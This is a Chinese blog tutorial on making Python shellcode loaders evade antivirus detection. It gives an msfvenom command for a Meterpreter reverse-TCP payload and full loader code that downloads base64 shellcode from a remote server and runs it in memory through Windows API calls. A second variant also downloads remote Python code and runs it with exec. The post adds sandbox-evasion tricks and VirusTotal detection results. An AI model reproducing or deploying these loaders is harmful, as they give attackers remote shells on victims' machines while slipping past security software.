python免杀基础——三步(查杀、连接、代码)情况

最新推荐文章于 2024-05-13 10:46:55 发布
最新推荐文章于 2024-05-13 10:46:55 发布
阅读量1.8k 收藏 8
点赞数 4
分类专栏: 渗透工具编写 渗透测试笔记 免杀 文章标签: 反弹shell windows 免杀 python 远程加载
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_19623861/article/details/127843391
版权

python免杀基础

目录

本文思路:
调用WindowAPI、采用shellcode无落地、代码无落地、远程加载、恶意代码加密;

1.远程调用shellcode、使用windowAPI;

(1)查杀情况

查杀情况,本文以微步云沙箱、VirusTotal测试为主::

  1. 微步云(我记得前几天我测的时候才俩,*&狗头)
    在这里插入图片描述
    在这里插入图片描述
  2. VirusTotal(这个多)
    在这里插入图片描述

(2)连接情况

本次使用msf生成的shellcode
具体命令如下:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xxx.x.x.x lport=80xx --encrypt base64 -f c

连接一样很丝滑
在这里插入图片描述

(3)代码情况

  1. windowAPI加载shellcode
def run1(shellcode):
    # windows api
    PAGE_EXECUTE_READWRITE = 0x00000040  # 区域可执行代码,可读可写
    MEM_COMMIT = 0x3000  # 分配内存
    # PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF)  # 给予进程所有权限
    VirtualAlloc = windll.kernel32.VirtualAlloc
    RtlMoveMemory = windll.kernel32.RtlMoveMemory
    CreateThread = windll.kernel32.CreateThread
    WaitForSingleObject = windll.kernel32.WaitForSingleObject
    VirtualAlloc.restype = ctypes.c_void_p  # 重载函数返回类型为void
    p = VirtualAlloc(c_int(0), c_int(len(shellcode)), MEM_COMMIT, PAGE_EXECUTE_READWRITE)  # 申请内存
    buf = (c_char * len(shellcode)).from_buffer(shellcode)  # 将shellcode指向指针
    RtlMoveMemory(c_void_p(p), buf, c_int(len(shellcode)))  # 复制shellcode进申请的内存中
    h = CreateThread(c_int(0), c_int(0), c_void_p(p), c_int(0), c_int(0), pointer(c_int(0)))  # 执行创建线程
    WaitForSingleObject(c_int(h), c_int(-1))  # 检测线程创建事件

以上是使用windowAPI进行加载shellcode,先声明,在申请内存,给权限,创建线程

  1. 对远程加密后的shellcode进行解密
encode_shellcode=requests.get("http://xxx.x.x.x:80xx/cccc.txt").text
shellcode=bytearray(base64.b64decode(encode_shellcode))
  1. 完整代码
from ctypes import *
from ctypes.wintypes import *
import sys
import requests
import base64
import time

encode_shellcode=requests.get("http://xxx.x.x.x:80xx/cccc.txt").text
shellcode=bytearray(base64.b64decode(encode_shellcode))

def run1(shellcode):
    # windows api
    PAGE_EXECUTE_READWRITE = 0x00000040  # 区域可执行代码,可读可写
    MEM_COMMIT = 0x3000  # 分配内存
    # PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF)  # 给予进程所有权限
    VirtualAlloc = windll.kernel32.VirtualAlloc
    RtlMoveMemory = windll.kernel32.RtlMoveMemory
    CreateThread = windll.kernel32.CreateThread
    WaitForSingleObject = windll.kernel32.WaitForSingleObject
    # OpenProcess = windll.kernel32.OpenProcess
    # VirtualAllocEx = windll.kernel32.VirtualAllocEx
    # WriteProcessMemory = windll.kernel32.WriteProcessMemory
    # CreateRemoteThread = windll.kernel32.CreateRemoteThread
    VirtualAlloc.restype = ctypes.c_void_p  # 重载函数返回类型为void
    p = VirtualAlloc(c_int(0), c_int(len(shellcode)), MEM_COMMIT, PAGE_EXECUTE_READWRITE)  # 申请内存
    buf = (c_char * len(shellcode)).from_buffer(shellcode)  # 将shellcode指向指针
    RtlMoveMemory(c_void_p(p), buf, c_int(len(shellcode)))  # 复制shellcode进申请的内存中
    h = CreateThread(c_int(0), c_int(0), c_void_p(p), c_int(0), c_int(0), pointer(c_int(0)))  # 执行创建线程
    WaitForSingleObject(c_int(h), c_int(-1))  # 检测线程创建事件

if __name__ == "__main__":
    time.sleep(10)
    try:
        if sys.argv[1]:
            run1(shellcode)
    except IndexError:
        pass

2.远程加载shellcode和执行代码

(1)查杀情况

  1. 微步云(比上次好点了,以后不传云沙箱了,这次为了分享)
    在这里插入图片描述

在这里插入图片描述
2. VirusTotal在这里插入图片描述

(2)连接情况

本次使用msf生成的shellcode
具体命令如下:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xxx.x.x.x lport=80xx --encrypt base64 -f c

连接和上次一样,秒连
这次有所不同的是,使用了接收命令行参数,当命令行参数>1时才会启动程序,这样做的目的是减少云沙箱虚拟运行的风险(我个人认为)
在这里插入图片描述
在这里插入图片描述

(3)代码情况

完整源代码》》》》

from ctypes import *
from ctypes.wintypes import *
import sys
import requests
import base64
import time
try:
    if sys.argv[1]:
        encode_shellcode=requests.get("http://xxx.x.x.x:80xx/cccc.txt").text
        shellcode=bytearray(base64.b64decode(encode_shellcode))
        func = requests.get("http://xxx.x.x.x:80xx/uuuu.txt").text
        func = base64.b64decode(func)
        exec(func)
except IndexError:
    pass

3.还有些话要说::

  • 免杀主要向特征码检测、行为检测、内存、云查杀,交互流量检测
  • 本次介绍的只是特征码检测和一点行为检测
  • 可以扩展的方向有::
  1. 可以在远程代码加载时次啊用更高级的加密方式(但也就能过静态查杀,添加个用户啥的就凉凉)
  2. 采用c++编写,不仅文件变小,免杀效果也会更好(同一个shellcode,py打包(pyinstaller)10MB,C++ 200KB)
  3. 不用远程加载,采用本地加载(还是靠加密方式)
  • 后续更深的操作,就不懂了,还在学习,有时间就会分享,,,大佬可以直接喷 ( *&狗头)
我重来不说话
关注
  • 4
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
[原创]Python免杀ShellCode加载器(Cobaltstrike/Metasploit)
weixin_30432179的博客
07-21 4974
0x001 原理 采用分离法,即将ShellCode和加载器分离。方法较LOW但免杀。 本文主要将ShellCode转成HEX,再通过加载器执行ShellCode。 PS: 何为SC加载器,即专门用于加载所提供ShellCode的工具。 如同HTTP发包工具,支持提交HTTP,写死参数最多只能叫EXP。 再详细点,打个比方,你只会炒一个菜,你敢说你是厨师吗? 0x002 ShellCo...
木马免杀代码python反序列化分离免杀
04-15 954
Cryptography是python语言中非常著名的加解密库,在算法层面提供了高层次的抽象,使用起来非常简单、直观,同时还保留了各种不同算法的低级别接口,保留灵活性我们知道加密一般分为对称加密(Symmetric Key Encryption)和非对称加密(Asymmetric Key Encryption)。各自对应多种不同的算法,每种算法又有不同的密钥位长要求,另外还涉及到不同的分组加密模式,以及末尾补齐方式。
【红蓝对抗】Python免杀入门学习
Fighter安全
04-23 1832
这里主要针对国内主流三大杀软进行免杀测试,python语法简单,开发效率高,适合入门学习,而且免杀效果也还不错。当然免杀是具有时效性的,文章的方法主要记录一下免杀思路。python环境:python2.7.18(x64)、python3.11.1(x64)windows环境:windows10、windows11杀毒软件:360杀毒(全引擎) + 火绒 + Windows Defender。
【渗透测试笔记】之【Python免杀——两行代码免杀。VT查杀率:10 68(思路
最新发布
2401_84968812的博客
05-13 1037
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
免杀学习(二)python
m0_62207170的博客
01-09 573
python免杀
Python免杀技术详解
weixin_68789096的博客
11-02 1483
在网络安全领域,Shellcode加载器通常被黑客用于将Shellcode加载到目标计算机的内存中并执行它。这些加载器被安全专业人员、研究人员和安全分析师用于分析恶意软件样本中的Shellcode部分,以便了解恶意软件的行为、目的和潜在威胁。Python的灵活性和强大的库,使得Python逐渐被用于Shellcode的加载免杀技术。我们可以利用Python中的ctypes库实现shellcode的加载,ctypes是Python的外部函数库。
Python常见的免杀方式
m0_62207482的博客
02-09 1228
使用pyinstaller生成的可执行文件 本身就具有一定的免杀能力,但是在与杀毒软件对抗时,部分杀毒软件也可以通 过分析可执行文件的内容来判断文件是否为恶意程序,导致这些代码仍然具有被 杀的可能。·BackDoor-factory工具,又称后门工厂(BDF),利用该工具,可以在不破 坏原来的可执行文件功能的前提下,在代码中注入恶意的shellcode攻击代码。一部分杀毒软件的API拦截操作是通过对API的前几个字节内容的 监测实现的,如果跳过了头部字节,就可以避开这种拦截方式。· 未导出API。
小王问我python怎么免杀,我沉默了......
Liyu_6618的博客
02-01 494
Python免杀Shellcode思路
利用Python进行数据分析——基础示例
02-24
此数据是美国官方网站从用户那搜集到的匿名数据。tz字段包含的是时区信息。根据info()与value_counts()的返回结果来看,tz列存在缺失值与空值,首先填充缺失值,然后处理空值:a字段包含的是浏览器、设备与应用等...
贪心问题(Python代码实现)——磁带最优存储问题
01-21
今早任务——贪心算法,Python代码实现算法课的作业。 磁带最优存储问题 设有n 个程序{1,2,…, n }要存放在长度为L的磁带上。程序i存放在磁带上的长度是Li, 1≤i≤n。这n 个程序的读取概率分别是p1,p2,…,pn,且p1+...
Python小游戏大全——40个
05-14
Python小游戏大全——40个,快来下载吧! Python小游戏大全——40个,快来下载吧! Python小游戏大全——40个,快来下载吧! Python小游戏大全——40个,快来下载吧! ...
python制作免杀软件教程及工具.zip
07-26
1. Python编程基础:理解Python语法,能编写和调试代码。 2. 进程通信:了解多进程(multiprocessing)、多线程(threading)以及队列(queue)等模块,以实现复杂的功能。 3. 反静态分析:通过混淆代码、使用无意义...
使用Python进行防病毒免杀解析
09-18
主要介绍了使用Python进行防病毒免杀,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
python免杀学习
m0_58595840的博客
01-06 447
python免杀bypass学习
免杀】分离免杀python
zhangshuaiijie的博客
06-28 696
shellcode是一段用于利用软件漏洞的有效负载代码,以其经常让攻击者获得shell而得名shellcode loader加载器是用来运行shellcode的加载器,用什么语言来写都可以思路就是将shellcode和loader分离开来,用loader加载存在于普通文件中的shellcode。
Python远程加载分离、反序列化免杀
qq_43606723的博客
08-15 1714
shellcode.py远程加载反序列化免杀手法
Python shellcode免杀
qq_25761407的博客
04-02 5523
Python shellcode免杀
基于python的简单免杀
2301_76232299的博客
11-21 1937
本次文章只用于技术讨论,学习,切勿用于非法用途。
python免杀初探
记录学习,一起进步
10-21 674
浅析evilhiding v1.0免杀方式
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我重来不说话

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值